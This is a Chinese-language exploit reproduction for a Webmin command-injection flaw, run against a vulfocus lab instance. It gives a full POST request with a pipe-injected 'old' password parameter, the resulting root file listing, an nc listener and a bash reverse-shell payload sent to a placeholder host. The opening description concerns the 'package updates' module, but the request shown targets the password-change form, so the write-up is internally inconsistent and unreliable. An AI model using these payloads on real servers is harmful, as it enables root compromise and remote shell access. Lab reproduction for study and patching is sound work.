漏洞详情:
该模块利用 Webmin 1.962 及更低版本中的任意命令执行漏洞。 任何授权“包更新”模块的用户都可以使用 root 权限执行任意命令。 它是通过规避针对 CVE-2019-12840 采取的措施而出现的。 s/\(-)|\(.)/string/g; 逃避不足以预防。 因此,由于包名变量直接放置在系统命令中,我们可以使用一些 HTTP 支持的转义字符对其进行操作。 例如,我们可以通过将命令行下一行来逃避控制。 我们可以使用 "%0A" 和 "%0C" urlencoded 行值来做到这一点。此外,为了使 paylad 正常工作,我们必须在有效负载的末尾添加双符号 (&&) (%26%26)
复现过程:
通过http://vulfocus.fofa.so/完成实验
访问地址:https://vulfocus.fofa.so:48998/
POST请求
Host: vulfocus.fofa.so:48998 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 55 Origin: https://vulfocus.fofa.so:48998 Connection: close Referer: https://vulfocus.fofa.so:48998/ Cookie: redirect=1; testing=1 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 user=1&pass=1&expired=2&old=dir&new1=test22&new2=test22 |
响应:
<center><h3>Failed to change password : The current password is incorrectCHANGELOG config.info.ru.UTF-8 module.info.es.UTF-8 acl-lib.pl config.info.ru_RU module.info.fr acl_security.pl config.info.ru_RU.UTF-8 module.info.fr.UTF-8 backup_config.pl config.info.ru_SU module.info.hu cert_form.cgi config.info.sk module.info.hu.UTF-8 cert_issue.cgi config.info.sk.UTF-8 module.info.it cert_output.cgi config.info.sv module.info.it.UTF-8 cgi_args.pl config.info.sv.UTF-8 module.info.ja_JP.UTF-8 config config.info.tr module.info.ja_JP.euc config-ALL-linux config.info.uk_UA module.info.ko_KR.UTF-8 config-freebsd config.info.uk_UA.UTF-8 module.info.ko_KR.euc config-macos config.info.zh_CN module.info.ms_MY config-netbsd config.info.zh_CN.UTF-8 module.info.ms_MY.UTF-8 config-openbsd config.info.zh_TW.Big5 module.info.nl config-solaris-10-ALL config.info.zh_TW.UTF-8 module.info.nl.UTF-8 config-syno-linux convert.cgi module.info.no config.info convert_form.cgi module.info.no.UTF-8 config.info.ar defaultacl module.info.pl config.info.bg delete_group.cgi module.info.pl.UTF-8 config.info.bg.UTF-8 delete_groups.cgi module.info.pt config.info.ca delete_session.cgi module.info.pt.UTF-8 config.info.ca.UTF-8 delete_user.cgi module.info.pt_BR config.info.cz delete_users.cgi module.info.pt_BR.UTF-8 config.info.cz.UTF-8 edit_acl.cgi module.info.ru.UTF-8 config.info.da edit_group.cgi module.info.ru_RU config.info.da.UTF-8 edit_pass.cgi module.info.ru_RU.UTF-8 config.info.de edit_rbac.cgi module.info.ru_SU config.info.de.UTF-8 edit_sql.cgi module.info.sk config.info.es edit_sync.cgi module.info.sk.UTF-8 config.info.es.UTF-8 edit_unix.cgi module.info.sv config.info.eu edit_user.cgi module.info.sv.UTF-8 config.info.eu.UTF-8 feedback_files.pl module.info.tr config.info.fa help module.info.zh_CN config.info.fr images module.info.zh_TW.Big5 config.info.fr.UTF-8 index.cgi negativeacl config.info.hr lang openssl.cnf config.info.hu list_sessions.cgi postinstall.pl config.info.hu.UTF-8 log_parser.pl save_acl.cgi config.info.it makedn.cgi save_group.cgi config.info.it.UTF-8 maketables.cgi save_pass.cgi config.info.ja_JP.UTF-8 md5-lib.pl save_sql.cgi config.info.ja_JP.euc module.info save_sync.cgi config.info.ko_KR.UTF-8 module.info.ar save_twofactor.cgi config.info.ko_KR.euc module.info.bg save_unix.cgi config.info.ms_MY module.info.bg.UTF-8 save_user.cgi config.info.ms_MY.UTF-8 module.info.ca schema.cgi config.info.nl module.info.ca.UTF-8 switch.cgi config.info.nl.UTF-8 module.info.cz system_info.pl config.info.no module.info.cz.UTF-8 twofactor.pl config.info.no.UTF-8 module.info.da twofactor_form.cgi config.info.pl module.info.da.UTF-8 useradmin_update.pl config.info.pl.UTF-8 module.info.de webmin.schema config.info.pt_BR module.info.de.UTF-8 config.info.pt_BR.UTF-8 module.info.es </h3></center> <hr> </div> <div data-autocomplete="1" class="-shell-port-"> <div class="-shell-port-container"> <div data-shell-config><i aria-label="Configuration" class="fa fa-lg fa-cogs"></i></div> <div aria-label="Close" class="-shell-port-close"></div> <div data-output="true"><pre data-xconsole></pre></div> <div class="-shell-port-cmd"> <span class="-shell-port-prompt"><span class="-shell-port-type">[@<span data-shell-host="2469abb357a9">2469abb357a9</span> <span class="-shell-port-pwd" data-home="/root" data-pwd="/root">~</span>]#</span></span><input type="text" data-command="true" autocomplete="off" spellcheck="false"><span class="-shell-port-cursor"> </span> </div> </div> </div> <div class="top-aprogress"></div> </body> </html> |
反弹
远程服务器:
Nc -vvlp 8888
test|bash -c "bash -i >%26 /dev/tcp/xxx.xxx.xxx.xxx/8888 0>%261"